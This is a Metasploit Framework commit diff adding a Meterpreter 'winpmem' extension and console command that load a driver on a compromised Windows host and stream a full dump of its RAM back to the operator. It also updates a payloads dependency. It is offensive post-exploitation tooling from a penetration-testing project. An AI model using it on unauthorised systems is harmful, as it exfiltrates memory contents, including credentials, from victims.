Land rapid7#7261, Winpmem Meterpreter extension

Brent Cook · Brent Cook · commit dcd64e59645b · 2016-11-14T16:52:11.000-06:00
diff --git a/Gemfile.lock b/Gemfile.lock
@@ -14,7 +14,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.1.28)
+      metasploit-payloads (= 1.1.29)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.0.8)
       msgpack
@@ -169,7 +169,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.1.28)
+    metasploit-payloads (1.1.29)
     metasploit_data_models (2.0.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb b/lib/rex/post/meterpreter/extensions/winpmem/tlv.rb
@@ -0,0 +1,13 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Winpmem
+  TLV_TYPE_WINPMEM_ERROR_CODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1)
+  TLV_TYPE_WINPMEM_MEMORY_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2)
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb
@@ -0,0 +1,51 @@
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/extensions/winpmem/tlv'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Winpmem
+###
+#
+# This meterpreter extension can be used to capture remote RAM
+#
+###
+class Winpmem < Extension
+  WINPMEM_ERROR_SUCCESS = 0
+  WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1
+  WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2
+  WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3
+  WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
+  WINPMEM_ERROR_UNKNOWN = 255
+
+  def initialize(client)
+    super(client, 'winpmem')
+
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'winpmem',
+          'ext'  => self
+        },
+      ])
+  end
+
+  def dump_ram
+    request = Packet.create_request('dump_ram')
+    response = client.send_request(request)
+    response_code = response.get_tlv_value(TLV_TYPE_WINPMEM_ERROR_CODE)
+
+    return 0, response_code, nil if response_code != WINPMEM_ERROR_SUCCESS
+
+    memory_size = response.get_tlv_value(TLV_TYPE_WINPMEM_MEMORY_SIZE)
+    channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID)
+
+    raise Exception, "We did not get a channel back!" if channel_id.nil?
+    #Open the compressed Channel
+    channel = Rex::Post::Meterpreter::Channels::Pool.new(client, channel_id, "winpmem", CHANNEL_FLAG_SYNCHRONOUS | CHANNEL_FLAG_COMPRESS)
+    return memory_size, response_code, channel
+  end
+end
+end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb
@@ -0,0 +1,90 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+  class Console::CommandDispatcher::Winpmem
+
+    Klass = Console::CommandDispatcher::Winpmem
+
+    include Console::CommandDispatcher
+
+    #
+    # Name for this dispatcher
+    #
+    def name
+      'Winpmem'
+    end
+
+    #
+    # List of supported commands.
+    #
+    def commands
+      {
+        'dump_ram'         => 'Dump victim RAM',
+      }
+    end
+
+    WINPMEM_ERROR_SUCCESS = 0
+    WINPMEM_ERROR_FAILED_LOAD_DRIVER = 1
+    WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 2
+    WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 3
+    WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 4
+    WINPMEM_ERROR_UNKNOWN = 255
+
+    def cmd_dump_ram(*args)
+      unless args[0]
+        print_error("Usage: dump_ram [output_file]")
+        return
+      end
+      path_raw = args[0]
+
+      fd = ::File.new(path_raw, 'wb+')
+      memory_size, response_code, channel = client.winpmem.dump_ram
+      case response_code
+      when WINPMEM_ERROR_FAILED_LOAD_DRIVER
+        print_error("Failed to load the driver")
+        return true
+      when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY
+        print_error("Failed to get the memory geometry")
+        return true
+      when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY
+        print_error("Failed to allocate memory")
+        return true
+      when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL
+        print_error("Failed to open the meterpreter Channel")
+        return true
+      end
+      print_good("Driver PMEM loaded successfully")
+      #Arbitrary big buffer size, could be optimized
+      buffer_size = 2**17
+      bytes_read = 0
+      next_message_byte = memory_size / 10
+      begin
+        data = channel.read(buffer_size)
+        until channel.eof
+          fd.write(data)
+          bytes_read += data.length
+          data = channel.read(buffer_size)
+          if bytes_read >= next_message_byte
+            print_good(((next_message_byte.to_f / memory_size) * 100).round.to_s + "% Downloaded")
+            next_message_byte += memory_size / 10
+          end
+        end
+        print_status("Download completed")
+      ensure
+        print_status("Unloading driver")
+        fd.close
+        #Unload the driver on channel close
+        channel.close
+      end
+      return true
+    end
+  end
+  end
+  end
+  end
+  end
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.1.28'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.1.29'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.0.8'
   # Needed by msfgui and other rpc components
